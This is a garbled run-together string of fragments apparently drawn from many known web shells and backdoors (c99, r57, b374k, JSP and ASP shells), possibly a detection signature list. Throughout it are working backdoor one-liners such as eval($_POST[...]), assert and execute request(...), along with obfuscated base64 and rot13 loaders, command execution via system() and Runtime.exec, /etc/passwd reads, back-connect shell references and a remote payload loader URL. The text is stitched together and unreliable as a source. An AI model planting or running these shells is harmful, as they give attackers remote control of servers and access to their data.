lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? \"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a 